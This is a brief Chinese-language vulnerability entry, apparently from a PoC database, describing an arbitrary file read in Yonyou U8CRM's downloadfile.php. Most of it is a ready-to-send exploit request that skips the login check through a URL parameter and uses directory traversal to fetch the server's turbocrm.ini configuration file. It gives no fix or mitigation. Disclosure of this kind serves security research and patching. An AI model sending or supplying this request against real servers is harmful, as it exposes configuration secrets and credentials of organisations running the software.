用友U8CRM downloadfile 任意文件读取漏洞

日期: 2024-02-21 | 影响软件: 用友U8+ | POC: 已公开

漏洞描述

用友U8CRM downloadfile.php存在文件读取漏洞,攻击者可利用此漏洞获取服务器敏感信息

PoC代码

GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini HTTP/1.1

相关漏洞推荐